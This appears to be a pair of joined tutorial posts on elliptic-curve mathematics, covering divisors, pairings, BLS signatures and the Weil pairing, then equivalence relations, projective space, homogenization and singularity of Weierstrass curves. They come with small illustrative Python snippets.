(Prerequisites: Fundamental Concepts Underlying Elliptic Curves (Level 1): Projective Space)
In complex analysis, we study functions that are differentiable (in the complex sense) at almost all points. The study of the zeros (\(f(z)=0\)) and poles (\((1/f)(z)=0\)) is very important. The famous Cauchy’s integral theorem implies that if \(f\) is holomorphic (does not have any poles) on a simply connected domain, then for any closed curve \(C\) in that domain,\[\oint_C f(z)\,dz=0.\] On the other hand, the residue theorem implies that when \(f\) has poles, the integral depends on the poles enclosed by \(C\) (through the residues of \(f\) there).
For polynomials, we know that \(f(x)=x\) and \(g(x)=x^2\) both have a zero at \(x=0\), but for \(g(x)\), the root is a “repeated root”. We say that for \(f(x)\), the order of zero (at \(x=0\)) is \(1\) while that of \(g(x)\) is \(2\).
On the other hand, \(h(x)=1/x\) and \(u(x)=1/x^2\) both have a pole at \(x=0\), but the order of pole of \(h\) is \(1\) while that of \(u\) is \(2\)^{1}.
In general, for a function \(f(z)\), the order of zero at a point \(z_0\) is \(m\) if \(f\) is analytic at \(z_0\), \(f^{(n)}(z_0)=0\) for \(n=0,1,\cdots,m-1\), and \(f^{(m)}(z_0)\neq 0\). The order of pole at a point \(z_0\) is \(m\) if the function \(1/f\) has a zero of order \(m\) at \(z_0\).
For rational functions (where it can be written as a fraction, both numerator and denominator are polynomials), the order of zero of the whole function is the order of zeros of the numerator minus the order of zeros of the denominator. We say the order of zero of the zero polynomial is infinity.
We can denote the order of zero of a holomorphic (complex-differentiable) function \(f\) at the point \(p\) by \(\ord_p(f)\). Then to extend the definition to meromorphic functions, if \(f=g/h\) where \(g\) and \(h\) are holomorphic, then \(\ord_p(f)=\ord_p(g)-\ord_p(h).\)
The order satisfies the following properties:
The zeros and poles of a meromorphic function can be captured in a simple object.
Let \(\Div(\mathbb{C}^*)\) be the free abelian group generated by the points of \(\mathbb{C}^*\)^{2}. Elements of \(\Div(\mathbb{C}^*)\) have the form \(\displaystyle\sum_{P\in\mathbb{C}^*} n_P (P)\), where the sum is finite.
These elements are called divisors. The group itself is called the divisor group of \(\mathbb{C}^*\).
If \(\displaystyle D=\sum_{P\in\mathbb{C}^*} n_P (P)\in \Div(\mathbb{C}^*)\), we can define the degree of the divisor as \(\displaystyle\deg D = \sum_{P\in\mathbb{C}^*} n_P\).
For a meromorphic function \(f(z)\), we can define the divisor of \(f\) as \[\div f=\sum_{P\in\mathbb{C}^*} \left(\ord_Pf\right)(P).\] Since \(f\) is meromorphic, the set of points \(P\) at which \(\ord_P f\neq 0\) is finite, so \(\div f\) is indeed a divisor. In fact, if \(f\in K(\mathbb{C}^*)^*\) (a non-zero meromorphic function), then \(\deg\div f=0\).
Let \(K(\mathbb{C}^*)\) be the field of meromorphic functions on \(\mathbb{C}^*\). Then the divisor function \(\div\cdot: K(\mathbb{C}^*)^*\to \Div(\mathbb{C}^*)\) is a homomorphism of groups. Divisors of the form \(\div f\) are known as principal divisors.
We say two divisors are linearly equivalent, denoted \(D\sim D'\), if \(D-D' = \div f\) for some meromorphic \(f\). This gives rise to the quotient group of \(\Div(\mathbb{C}^*)\) by the principal divisors, called the Picard group (or the divisor class group) of \(\mathbb{C}^*\), denoted as \(\Pic(\mathbb{C}^*)\) or \(\Cl(\mathbb{C}^*)\).
Let’s work through an example of computing the divisor of the function \(f(z) = z^2 + 1\). Clearly \(f\) has a zero of order \(1\) at each of \(z=i\) and \(z=-i\). However, since we are working on \(\mathbb{C}^*\), we also need to consider the point at infinity. We say \(f\) has a zero at infinity if \(f(\frac 1z)\) has a zero at \(z=0\), and a pole at infinity if \(f(\frac 1z)\) has a pole at \(z=0\).
Here we have \(f(\frac 1z) = \frac{1}{z^2}+1\), which has a pole of order \(2\) at \(z=0\). So the divisor of \(f\) is \[\div f = (i)+(-i)-2(\infty).\]
Of course, since \(f\) is meromorphic, we already know that \(\deg \div f = 0\), so after computing the zeros and poles of points in \(\mathbb{C}\), we can already conclude that \(\ord_\infty f = -2\).
Now we turn our attention back to elliptic curves. The theory of divisors is almost the same as in the case of \(\mathbb{C}^*\) (with the details omitted for now), except that on the Riemann sphere we consider meromorphic functions, while on elliptic curves the functions we consider are rational functions. We shall discuss these next time, but for now, just think of them as “locally” a ratio of polynomials.
Using the definition as above, and let \(E\) be an elliptic curve,
Theorem : For each degree-0 divisor \(D\in \Div(E)\), there exists a point \(P\in E\) such that \(D\sim(P)-(\mathcal{O})\).
This gives an isomorphism of groups between \(E\), and the degree-0 part of the Picard group \(\Pic^0(E)\) (where the group operation is taken from \(\Div(E)\)).
Corollary : Let \(E\) be an elliptic curve and \(\displaystyle D=\sum_{P\in E}n_P(P)\in\Div(E)\) be a divisor. Then \(D\) is a principal divisor if and only if\[\sum_{P\in E}n_P=0\qquad\text{and}\qquad\sum_{P\in E} [n_P]P = \mathcal{O} \]
where the second summation uses the group law of the elliptic curve.
To see how divisors relate to cryptography, we first turn our attention back to cryptography.
Let \(G_1,G_2,G_T\) be three cyclic groups all of order \(q\), where \(q\) is a prime number. By convention we write the first two group additively, and the third multiplicatively. Then a pairing is a map \(e:G_1\times G_2\to G_T\) such that
Example (Determinant): For every free \(R\)-module \(M\) of rank 2, the determinant map \(\det: M\times M\to R\) is a non-degenerate bilinear map.
Let \(R=\mathbb{Z}/m\mathbb{Z}\) where \(m\) is an integer larger than 1, and consider the free \(R\)-module \(R\times R\); the determinant is a pairing. Choosing a basis \(\{u, v\}\), we have \[\det(au+bv, cu+dv)=ad-bc \] where we note that the value is independent of the choice of basis.
We also note that the definition of pairing implies for every \(P\in G_1, Q\in G_2\) and \(a,b\in \mathbb{Z}\), we have \(e(aP,bQ)={e(P,Q)}^{ab}\).
Example : Let \(G_1=G_2=F_5\) (under addition), and \(G_T=\langle 5\rangle =\{1,3,4,5,9\}\subset F_{11}^\times\) (under multiplication). Then the map \(e:G_1\times G_2\to G_T\), \(e(x,y)=3^{xy}\pmod{11}\) is a pairing.
Check to see that \(e(u+v, w)=3^{(u+v)w}= 3^{uw}3^{vw}=e(u,w)e(v,w)\). The case for \(G_2\) is the same. To see non-degeneracy, in this case we just need to enumerate all possibilities.
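The enumeration can be done mechanically. The following is a minimal sketch in plain Python, not the original post's code; the names `e`, `is_bilinear` and `is_non_degenerate` are made up for illustration, and non-degeneracy is assumed to mean that every non-zero \(x\) satisfies \(e(x,y)\neq 1\) for some \(y\).

```python
from itertools import product

Q = 5      # order of G_1 = G_2 = F_5 (written additively)
P = 11     # G_T is a subgroup of the multiplicative group of F_11
BASE = 3   # 3 has multiplicative order 5 modulo 11

def e(x: int, y: int) -> int:
    """Toy pairing e(x, y) = 3^(x*y) mod 11."""
    return pow(BASE, (x * y) % Q, P)

def is_bilinear() -> bool:
    """Check additivity in each argument over all of F_5."""
    for u, v, w in product(range(Q), repeat=3):
        if e((u + v) % Q, w) != (e(u, w) * e(v, w)) % P:
            return False
        if e(w, (u + v) % Q) != (e(w, u) * e(w, v)) % P:
            return False
    return True

def is_non_degenerate() -> bool:
    """Assumed meaning: every non-zero x pairs non-trivially with some y."""
    return all(any(e(x, y) != 1 for y in range(Q)) for x in range(1, Q))

print(is_bilinear(), is_non_degenerate())
# The image of e is exactly the subgroup generated by 5 in F_11^x.
print(sorted({e(x, y) for x in range(Q) for y in range(Q)}))
```

Reducing the exponent modulo 5 is harmless here because \(3^5\equiv 1\pmod{11}\).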
Exercise: Let \(G_1,G_2,G_T\) as above, \(u\in G_1, v\in G_2\) and \(a\in \mathbb{Z}_{>0}\). Show that \(e(au, v) = e(u,av)\).
One application of pairings in cryptography is to create digital signatures. Let \(G, G_T\) be cyclic groups of prime order \(q\), and \(e: G\times G\to G_T\) be a pairing. Additionally we also assume a hash function \(H\) that outputs an element in \(G\). Pick a generator \(g\) for \(G\).
To generate the key, we pick a random integer \(x\) with \(0<x<q\), the private key is \(x\), and the public key is \(g^x\).
To sign a message \(m\), we first compute the hash of it \(H(m)\), then the signature is \(H(m)^x\).
To verify a signature \(s\) on a message \(m\) against the public key \(pk\), we simply check that \(e(s,g) = e(H(m),pk)\).
The correctness of the signature is due to the fact that \(e(s,g) = e(H(m)^x, g) = e(H(m), g^x) = e(H(m), pk)\).
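To make the key generation, signing and verification steps concrete, here is a toy sketch that reuses the small pairing \(e(x,y)=3^{xy}\pmod{11}\) on \(\mathbb{Z}/5\mathbb{Z}\) from the example above. It is only an illustration under loud assumptions: the group is written additively (so \(g^x\) becomes \(x\cdot g\)), the hash-to-group function is a hypothetical SHA-256 reduction modulo 5, and a group of order 5 offers no security whatsoever.

```python
import hashlib

Q = 5       # toy group order (insecure, for illustration only)
P = 11      # modulus for the target group G_T
BASE = 3    # element of order 5 in F_11^x
G = 1       # generator of the additive group Z/5Z

def pairing(a: int, b: int) -> int:
    """Toy pairing e(a, b) = 3^(a*b) mod 11."""
    return pow(BASE, (a * b) % Q, P)

def hash_to_group(message: bytes) -> int:
    """Hypothetical hash H: maps a message to an element of Z/5Z."""
    digest = hashlib.sha256(message).digest()
    return int.from_bytes(digest, "big") % Q

def public_key(sk: int) -> int:
    """pk = g^x, written additively as x * g."""
    return (sk * G) % Q

def sign(sk: int, message: bytes) -> int:
    """s = H(m)^x, written additively as x * H(m)."""
    return (sk * hash_to_group(message)) % Q

def verify(pk: int, message: bytes, sig: int) -> bool:
    """Accept iff e(s, g) == e(H(m), pk)."""
    return pairing(sig, G) == pairing(hash_to_group(message), pk)

sk = 3
pk = public_key(sk)
sig = sign(sk, b"hello")
print(verify(pk, b"hello", sig))
```

In a real deployment the groups would be elliptic curve groups of cryptographic size and the hash would map into the curve group; none of that is modelled here.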
One nice property of BLS is that the signature is very small: it consists of only a single group element (of roughly the same size as \(q\))!
The security of BLS relies on the fact that (roughly) the discrete logarithm problem of the underlying group \(G\) is hard. More specifically, we assume that the computational Diffie-Hellman (CDH) problem is intractable.
Definition (CDH): Let \(\langle g\rangle\) be a finite cyclic group of prime order \(p\), and let \(a,b\in \mathbb{Z}_p^*\). Given \((g, g^a, g^b)\), the computational Diffie-Hellman problem asks for the value of \(g^{ab}\).
Now we try to construct a pairing with elliptic curves. Let \(E\) be an elliptic curve over \(K\), \(m\) an integer larger than 2, which is relatively prime to \(char(K)\).
Proposition-Definition (\(m\)-torsion point): The group of \(m\)-torsion points is \(E[m]=\{P\in E: [m]P=\mathcal{O}\}\), the set of points \(P\in E\) such that \([m]P=\mathcal{O}\). It is the kernel of the function \([m]: E\to E\) defined by \(P\mapsto [m]P\).
We have that \(E[m] \cong \mathbb{Z}/m\mathbb{Z} \times \mathbb{Z}/m\mathbb{Z}\).
Let \(P, Q\in E[m]\), and choose a rational function \(F\) whose divisor is \[\div F = \sum_{0\leq k<m} \big((P+[k]Q) - ([k]Q)\big). \] This is possible because the divisor has degree \(0\) and \(\displaystyle \sum_{0\leq k<m} \big((P+[k]Q) - [k]Q\big) = [m]P= \mathcal{O}\) (since \(P\) is an \(m\)-torsion point), so by the corollary above the divisor is principal.
Let \(G(X) = F(X+Q)\). Then the divisor of \(G\) is the same as that of \(F\) (translating by \(Q\) only permutes the points \([k]Q\), since \(Q\) is an \(m\)-torsion point), so \(F(X+Q)/F(X)\) is constant, and it is an \(m\)-th root of unity. Then define the Weil pairing as \(e_m(P,Q) = \frac{F(X+Q)}{F(X)}\). This is a mapping from \(E[m]\times E[m]\to \mu_m\), where \(\mu_m\) contains the \(m\)-th roots of unity \(\mu_m=\{x\in K: x^m=1\}\).
Here we use the curve BLS12-381 as an example, which is defined by \(y^2=x^3+4\pmod{q}\) where \(q\) is as defined below. The code snippet below shows a Weil pairing with \(m=11\).
Silverman, J. H. (2009). The arithmetic of elliptic curves (Vol. 106, pp. xx+513). New York: Springer.
(Prerequisites: Fundamental Concepts Underlying Elliptic Curves (Level 0): High-level Overview)
The point at infinity raises many questions. For example, why is it represented as \((0:1:0)\) and other points as \((x:y:1)\)?
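A relation \(R\) over the set \(X\) is a subset of \(X\times X\). If \((a,b)\in R\), we write \(aRb\), or \(a\sim b\), and we also refer to \(\sim\) itself as the relation.
Using the notion of relation, we can define an equivalence relation on \(X\) as a relation \(\sim\) such that, for all \(a,b,c\in X\): \(a\sim a\) (reflexivity); \(a\sim b\) implies \(b\sim a\) (symmetry); and \(a\sim b\) together with \(b\sim c\) implies \(a\sim c\) (transitivity).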
The trivial relation \(S\times S\) (so \(a\sim b\) for every \(a,b\in S\)) and the diagonal relation \(\Delta=\{(a,a):a\in S\}\) (so we only have \(a\sim a\) for all \(a\in S\) and nothing else) are equivalence relations on \(S\).
On the other hand, the empty relation \(\emptyset\) on a non-empty set \(X\) is a relation, but not an equivalence relation. To see why, note that reflexivity requires \((a,a)\in R\) for all \(a\in X\), but the empty relation contains no pairs at all.
This also disproves the misconception some students have when learning the subject: if we have symmetry and transitivity, symmetry gives \(a\sim b\) and \(b\sim a\), then transitivity gives \(a\sim a\), so reflexivity is not needed, right? The empty relation is a counter-example to this, since the argument only works when some \(b\) with \(a\sim b\) exists.
Define a relation \(\sim\) on \(Q=\mathbb{Z}\times(\mathbb{Z}-\{0\})\) as saying \((a,b)\sim (c,d)\) if \(ad=bc\). This in fact defines the equivalence of fractions by viewing \((a,b)\) as \(a/b\).
So \((x_1,y_1)\sim(x_3,y_3)\).
Exercise
For any \(a,b\in\mathbb{Z}\), say \(a\equiv b\) (mod n) if \(a-b\) is divisible by n, or \(\exists k\in\mathbb{Z}\) such that \(a-b=nk\). Verify that this is an equivalence relation.
Let \(\equiv\) be an equivalence relation defined on the set \(X\). Take \(a\in X\), and denote the equivalence class of \(a\) by \([a]=\{k\in X: a\equiv k\}\), the set of elements equivalent to \(a\). Then \(\forall a,b\in X\), either\[ [a]=[b]\text{ or } [a]\cap[b]=\emptyset. \] This essentially shows that the equivalence relation partitions the set \(X\).
Take \(a,b\in X\) and let \(\equiv\) be the equivalence relation.
If there are any elements, say \(c\), such that \(c\) is both in \([a]\) and \([b]\), then we have that\[
a\equiv c\text{ and } b\equiv c.\]
By symmetry of equivalence relations, we get \(c \equiv b\). Then by transitivity, we get \(a\equiv b\). Now consider any element \(k\in [b]\). We get \(b\equiv k\), so by transitivity again, we get \(a\equiv k\), so \([b]\subseteq[a]\).
Similarly, every element in \([a]\) is equivalent to b, so \([a]\subseteq[b]\).
In this case we have \[[a]=[b].\]
If there are no common elements in \([a]\) and \([b]\), then by definition \([a]\cap[b]=\emptyset\).
Given a set \(X\) and an equivalence relation \(\sim\) on \(X\), we can define the quotient set \(X/\sim\) to be the set of equivalence classes \(\{[a]: a\in X\}\).
As an example, take the mod equivalence relation on \(\mathbb{Z}\), i.e. for any \(a,b\in\mathbb{Z}\), say \(a\equiv b\) (mod n) if \(a-b\) is divisible by n. This partitions the integers into \(n\) equivalence classes. The equivalence classes are the \(n\) different remainders of integers when dividing by \(n\). This gives us the quotient set \(\mathbb{Z}/n\mathbb{Z}=\{[x]:x\in\mathbb{Z}\}\) which we can take the representative \([x]\) for \(x=0,1,\cdots,n-1\), so we can view \(\mathbb{Z}/n\mathbb{Z}=\{0,1,\cdots,n-1\}\).
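As a small illustration of how an equivalence relation partitions a set, the sketch below groups a finite range of integers into classes modulo \(n\). The helper name `equivalence_classes` is made up for this example, and it relies on the relation really being an equivalence relation (it only compares against one representative per class).

```python
def equivalence_classes(elements, related):
    """Partition `elements` into classes of the equivalence relation `related`."""
    classes = []
    for x in elements:
        for cls in classes:
            # Comparing with one representative suffices for an equivalence relation.
            if related(cls[0], x):
                cls.append(x)
                break
        else:
            classes.append([x])
    return classes

n = 4
classes = equivalence_classes(range(-6, 7), lambda a, b: (a - b) % n == 0)
for cls in classes:
    # Each class is labelled by its representative in {0, 1, ..., n-1}.
    print(cls[0] % n, cls)
```

Every integer in the range lands in exactly one of the \(n\) classes, which is the partition property proved above.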
Given a function \(f\) on the set \(X\) and an equivalence relation \(\sim\) on \(X\), we can try to construct a “function” \(\tilde{f}\) on the quotient set \(X/\sim\) by setting \(\tilde{f}([x])=f(x)\). This is problematic, however, because if we pick two elements \(a,b\) from the same equivalence class \([x]\), then since \([a]=[b]\), the definition gives \(\tilde{f}([a])=\tilde{f}([b])\), which means that we will need \(f(a)=f(b)\).
The property that every representative of the same equivalence class should map to the same value is not trivial. This property is called well-definedness. A function is well-defined on the quotient when the value of the function is independent of the choice of representative.
It turns out that in general, functions defined this way are not well-defined. However when we deal with sets with additional structures such as groups and rings, this construction of \(\tilde{f}\) on certain equivalence relations will give a well-defined function. For example, the multiplication of integers mod \(n\), constructed using the ordinary integer multiplication, is well-defined.
Let us look at an example of non well-defined function^{1}.
We define a function on non-zero fractions: write the fraction as \(\frac{a}{b}\), and set \(f(\frac{a}{b})=b\). This function is not well-defined, because for example \(f(\frac{1}{2})=2\), but \(f(\frac{2}{4})=4\), and \(\frac{1}{2}=\frac{2}{4}\). When we fix this by changing the definition to \(g(\frac{a}{b})=b/\gcd(a,b)\) (taking \(b>0\)), this will be well-defined, because dividing by the gcd gives us the denominator of the reduced form of the fraction, which is unique.
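The difference between the two definitions can be checked on a few representatives of the same fraction. This is only a sketch: a fraction is modelled as a pair of positive integers `(a, b)`, which is an assumption made to keep the example short.

```python
from math import gcd

def f(a: int, b: int) -> int:
    """Depends on the representative: not well-defined on fractions."""
    return b

def g(a: int, b: int) -> int:
    """Denominator of the reduced form: independent of the representative."""
    return b // gcd(a, b)

# Four representatives of the same fraction 1/2.
same_fraction = [(1, 2), (2, 4), (3, 6), (50, 100)]

f_values = {f(a, b) for a, b in same_fraction}
g_values = {g(a, b) for a, b in same_fraction}
print(f_values)  # several different values
print(g_values)  # a single value
```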
Now we are ready to talk about the projective space. Instead of considering the points in the space \(K^n\) (where \(K\) is a field), we can consider the lines in \(K^n\), with the condition that they must pass through the origin.
For example, let’s consider the real Euclidean plane \(\mathbb{R}^2\). The lines that pass through the origin all have the form \(y=kx\), where \(k\in\mathbb{R}\) is the slope, or \(x = 0\) for the vertical line. We can also just use a point \(P=(x,y)\neq(0,0)\) to represent a line by constructing the unique line passing through \(P\) and the origin.
In this case, if we have two points \(P\) and \(Q\), with \(P\), \(Q\) and the origin being collinear, then \(P\) and \(Q\) will define the same line, so we can consider them to be equivalent. If \(P=(x,y)\) and \(Q=(x',y')\), then \(P\) and \(Q\) define the same line if and only if there exists a non-zero real number \(\lambda\) such that \(x'=\lambda x\) and \(y'=\lambda y\). Of course \((0,0)\) cannot define a line in this way.
Using this construction, we just made the real projective line \(\mathbb{P}^1(\mathbb{R})\). We can generalize this construction by using the point construction.
Given a field \(K\), define the Projective \(n\)-space to be the set \(\mathbb{P}^n(K)=\{(x_0,\cdots,x_n)\in K^{n+1}-\{0\}: x_i\in K\}/\sim\), where we declare \((x_0,\cdots,x_n)\sim(y_0,\cdots,y_n)\) if there exists \(\lambda\in K-\{0\}\) such that \((x_0,\cdots,x_n)=(\lambda y_0,\cdots,\lambda y_n)\).
We can denote the equivalence class of \((x_0,\cdots,x_n)\) by \([x_0:\cdots:x_n]\) or \([x_0,\cdots,x_n]\); these are called homogeneous coordinates.
Take \([a,b]\in \mathbb{P}^1(\mathbb{R})\).
If \(b\neq 0\), we have \([a,b]=[a/b,1]\), and we can actually rewrite as \([x,1]\), where \(x\in\mathbb{R}\).
If \(b=0\), then \(a\neq 0\) so we can rewrite \([a,0]=[1,0]\).
In summary, we have \(\mathbb{P}^1(\mathbb{R})=\{[x,1]: x\in\mathbb{R}\}\sqcup\{[1,0]\}\).
We can describe \(\mathbb{P}^1(\mathbb{R})\) as the set of all lines that pass through the origin. Note that \([a,b]=[\lambda a, \lambda b]\) exactly means that \((a,b)\) and \((\lambda a, \lambda b)\) lie on the same line through the origin. Then \([a,1]\) gives the line \(x=ay\) and \([1,0]\) gives the horizontal line \(y=0\).
Another interpretation is that since \(\{[x,1]: x\in\mathbb{R}\}\) is really just \(\mathbb{R}\) (since the second coordinate does nothing), we can regard \(\mathbb{P}^1(\mathbb{R})\) as \(\mathbb{R}\), but with an extra point \([1,0]\) that we shall call the point at infinity. Some may denote this as \(\mathbb{R}\cup\{\mathcal{O}\}\), where we use \(\mathcal{O}\) to denote the point at infinity.
Taking the line interpretation, for each line that passes through the origin we can pick a point on the upper half of the unit circle (such a line meets the unit circle at 2 points, so we pick the one on the upper half). The points \((-1,0)\) and \((1,0)\) represent the same line, so we can join them together (identify them as the same point), and we see that in fact \(\mathbb{P}^1(\mathbb{R})\) is really the same as a circle. Since the circle is compact, \(\mathbb{P}^1(\mathbb{R})\) (with the quotient topology from \(\mathbb{R}^2-\{0\}\)) is also compact.
How about \(\mathbb{P}^2(K)\)? It consists of the points \([x,y,z]\). If \(z \neq 0\), then we can just divide the whole thing by \(z\) to get \([x/z,y/z,1]\), and we can map these points \([a,b,1] \mapsto (a,b)\in K^2\). If \(z=0\), then since we cannot divide by zero, we consider the points \([x,y,0]\) the points at infinity.
In fact, if \(y\neq 0\) we can divide by \(y\) to get \([a,1,0]\) (in particular \([0,1,0]\) when \(x=0\)), and if \(y=0\) then \(x\neq 0\) and we get \([1,0,0]\). So when \(z=0\), the remaining coordinates resemble \(\mathbb{P}^1(K)\)! In summary we have the following disjoint union: \[ \mathbb{P}^2(K)=K^2\sqcup\mathbb{P}^1(K)\]
We can also make a general statement of \(\mathbb{P}^n(K) = K^n\sqcup\mathbb{P}^{n-1}(K)\) with the same argument.
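Over a finite field \(\mathbb{F}_p\) this decomposition can be checked by brute force. The sketch below is an illustration only (the helper names `normalize` and `projective_points` are invented here): each non-zero vector is scaled so that its last non-zero coordinate is 1, which picks one representative per equivalence class, matching the representatives \([x,1]\) and \([1,0]\) used above. It assumes Python 3.8+ for `pow(c, -1, p)`.

```python
from itertools import product

def normalize(point, p):
    """Scale a non-zero vector over F_p so its last non-zero coordinate is 1."""
    for c in reversed(point):
        if c % p != 0:
            inv = pow(c, -1, p)  # modular inverse (Python 3.8+)
            return tuple((x * inv) % p for x in point)
    raise ValueError("(0, ..., 0) does not define a projective point")

def projective_points(n, p):
    """All points of P^n(F_p), one normalized representative per class."""
    return {normalize(v, p) for v in product(range(p), repeat=n + 1) if any(v)}

p = 3
plane = projective_points(2, p)
affine_part = {pt for pt in plane if pt[2] == 1}   # copies of K^2
at_infinity = {pt for pt in plane if pt[2] == 0}   # a copy of P^1(K)
print(len(plane), len(affine_part), len(at_infinity))
```

The affine part has \(p^2\) points and the part at infinity has \(p+1\) points, giving \(p^2+p+1\) in total.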
We also have another space, the usual \(K^n\), which we will call the affine \(n\)-space \(\mathbb{A}^n(K)=\{(x_1,\cdots,x_n):x_i\in K\}\).
For an affine space \(\mathbb{A}^n(K)\), we can define a polynomial \(f(x_1,\cdots,x_n)\) as a formal sum of the form \(\displaystyle\sum_{d=0}^N\sum_{i_1+\cdots+i_n = d} a_{i_1i_2\cdots i_n} x_1^{i_1}\cdots x_n^{i_n}\), where \(a_{i_1\cdots i_n}\in K\). The degree of a polynomial is the highest sum of the exponents of the variables among the terms with non-zero coefficients. For example, \(f(x,y)=xy^3 + x^2 + xy + y + 1\) has degree 4.
There is a polynomial evaluation function \(\phi_f:\mathbb{A}^n(K)\to K\) mapping \((a_1,\cdots,a_n)\mapsto f(a_1,\cdots,a_n)\). Then we can talk about the set of points \(V(f)=\{P\in\mathbb{A}^n(K): f(P)=0\}\), aka the roots. This can give us an example of an affine variety, but we shall discuss this next time.
Can this be mimicked in the projective space? Given \(f(x_0,\cdots,x_n)\), we may, carelessly, consider the roots of \(f(P)=0\), where \(P\in\mathbb{P}^n(K)\). This is problematic, however, because \(\lambda P \sim P\) for any non-zero \(\lambda\in K\), but \(f(P)=0\) in general does not mean \(f(\lambda P)=0\).
We say the function \(\phi_f: \mathbb{P}^n(K)\to K\) by \(\phi_f(P)=f(P)\) is not well-defined, because the value will depend on the choice of the representative \(P\) in the equivalence class.
This is why we can only consider polynomials for which \(f(P)=0\) does imply \(f(\lambda P)=0\) for every non-zero \(\lambda\in K\).
Definition:
We say a polynomial \(f(x_1,\cdots,x_n)\) is homogeneous of degree \(d\) if all the terms \(a_{i_1i_2\cdots i_n} x_1^{i_1}\cdots x_n^{i_n}\) with \(a_{i_1i_2\cdots i_n}\neq 0\) have the property that \(i_1+\cdots+i_n=d\).
Equivalently, for all \(\lambda\in K\), \(f(\lambda x_1,\cdots,\lambda x_n)=\lambda^d f(x_1,\cdots,x_n)\).
Exercise
Prove that the two conditions are indeed equivalent.
For a homogeneous polynomial \(f\), and \(P\in\mathbb{P}^n(K)\), we really have \(f(P)=0\) implying \(f(\lambda P)=0\) for all non-zero \(\lambda\in K\). So we can make sense of the roots of homogeneous polynomials in projective space. We can also use the notation \(V(f)=\{P\in\mathbb{P}^n(K): f(P)=0\}\) where \(f\) is a homogeneous polynomial. This is a projective variety, and we will also delay the discussion of this.
For any polynomial \(f(x_1,\cdots,x_n)\), we can convert it to a homogeneous polynomial \(F(x_0, x_1,\cdots,x_n)\) of degree \(d\) (\(d\) equal to the largest degree of the terms in \(f\)) by setting \(F(x_0,\cdots,x_n)=x_0^d f(\frac{x_1}{x_0},\cdots,\frac{x_n}{x_0})\), or you may just think of the operation as multiplying each term by an appropriate power of \(x_0\), so that in the end result, every term has degree \(d\). This is called the homogenization of the polynomial.
We can convert \(F(x_0, x_1,\cdots,x_n)\) to \(f(x_1,\cdots,x_n)\) easily by \[ f(x_1,\cdots,x_n)=F(\mathbf{1},x_1,\cdots,x_n).\]
For \(f(x,y) = y^2 - x^3 + 1\), the homogenization of \(f(x,y)\) will be \(F(x,y,z) = y^2z - x^3 + z^3\) (the new variable \(z\) is placed in the third coordinate for simplicity). Then \(F(x,y,1) = y^2-x^3+1 = f(x,y)\).
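Homogenization is mechanical enough to sketch in a few lines. In the illustration below a polynomial is stored as a dictionary from exponent tuples to coefficients (a representation chosen just for this example), and the new variable is appended as the last coordinate, as in the example above.

```python
def homogenize(poly):
    """Pad every term with a power of a new last variable up to the total degree.

    `poly` maps exponent tuples, e.g. (i, j) for x^i y^j, to coefficients.
    """
    d = max(sum(exps) for exps, c in poly.items() if c != 0)
    return {exps + (d - sum(exps),): c for exps, c in poly.items() if c != 0}

def evaluate(poly, point):
    """Evaluate a polynomial in the dictionary representation at a point."""
    total = 0
    for exps, c in poly.items():
        term = c
        for base, exponent in zip(point, exps):
            term *= base ** exponent
        total += term
    return total

f = {(0, 2): 1, (3, 0): -1, (0, 0): 1}   # y^2 - x^3 + 1
F = homogenize(f)                         # y^2 z - x^3 + z^3

print(F)
print(evaluate(f, (2, 3)), evaluate(F, (2, 3, 1)))   # dehomogenizing: F(x, y, 1) = f(x, y)
print(evaluate(F, (10, 15, 5)))                       # equals 5^3 * F(2, 3, 1)
```

The last line illustrates the scaling property \(F(\lambda x,\lambda y,\lambda z)=\lambda^d F(x,y,z)\) with \(\lambda=5\) and \(d=3\).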
Exercise
Show that any homogeneous polynomial \(F(x_1,\cdots,x_n)\) of degree \(d\) satisfies the following:\[ d\cdot F=\sum\limits_{i=1}^n x_i \frac{\partial F}{\partial x_i}\]
For elliptic curves in (short) Weierstrass form \(f(x,y) = y^2 -( x^3 + Ax + B)\), the homogenization is \(F(x,y,z)=y^2z -( x^3 + Axz^2 + Bz^3)\). Now for any \((x,y)\in \mathbb{A}^2(K)\), we have an inclusion \(i: \mathbb{A}^2(K)\hookrightarrow \mathbb{P}^2(K)\) by \((x,y)\mapsto [x,y,1]\). So for those points, \(F(i(x,y)) = f(x,y)\).
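If \(z=0\), then \(F(x,y,0) = -x^3\), which vanishes only when \(x=0\). Since \(F(0,y,0) = 0\) for any \(y\neq 0\) (\(y=0\) is not allowed, as \([0,0,0]\) is not a point of projective space), and all of the \([0,y,0]\) are the same point \([0,1,0]\), there is only 1 point at infinity (out of all those of the form \([x,y,0]\)) that is also on the elliptic curve, namely \([0,1,0]\).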
This suggests that we should define elliptic curves using projective space as: given the polynomial \(f(x,y) = y^2 - (x^3 + Ax+B)\) in short Weierstrass form, the elliptic curve is the set of points that satisfy \(F(x,y,z)=0\), i.e. \[ E(K) = \{ P\in \mathbb{P}^2(K): F(P)=0 \} \]
This will consist of \(\{[x,y,1]: f(x,y)=F(x,y,1)=0\}\subset \mathbb{P}^2(K)\), and the point at infinity \([0,1,0]\). \([x,y,1]\) can be mapped back to \((x,y)\in \mathbb{A}^2(K)\), and \([0,1,0]\) is a special point we call the point at infinity \(\mathcal{O}\).
In sage, we can use the projective coordinates to represent a point on an elliptic curve.
With the projective space description above, we can finally define a “differentiable” elliptic curve.
We say a curve \(C\) (defined by a single equation \(f(x_1,\cdots,x_n)=0\)) is singular at a point \(P\in C\) if \(\frac{\partial f}{\partial x_i}(P)=0\) for all \(i\in\{1,\cdots,n\}\). Otherwise the curve is non-singular at \(P\).
If the curve is non-singular at all points, it is called a non-singular curve. If the curve is singular at some points, it is called a singular curve.
Remark:
Note that the partial derivatives of polynomials can always be defined formally by \(\frac{dx^n}{dx}= nx^{n-1}\). However, if the characteristic of the field divides \(n\), then \(\frac{dx^n}{dx}=0\). In any case, for a polynomial \(f\), we always have that \(\frac{\partial f}{\partial x_i}\) is a polynomial, so everything is good.
Now we can prove the following result: An elliptic curve defined by the short Weierstrass equation \(y^2=x^3+Ax+B\) is non-singular at all points if and only if the discriminant \(\Delta=4A^3+27B^2\) is non-zero.
First we will show that the point at infinity is never singular: The homogeneous equation of \(C\) is \(F(x,y,z)=y^2z-x^3-Axz^2-Bz^3=0\). We have that \(\frac{\partial F}{\partial z}=y^2-2zAx-3z^2B\), so \(\frac{\partial F}{\partial z}(0,1,0)=1\) which is not zero.
Now say \(P\in E\) is not the point at infinity. Then the curve is singular at \(P\) iff \(\frac{\partial f}{\partial x}(P)=\frac{\partial f}{\partial y}(P)=0\).
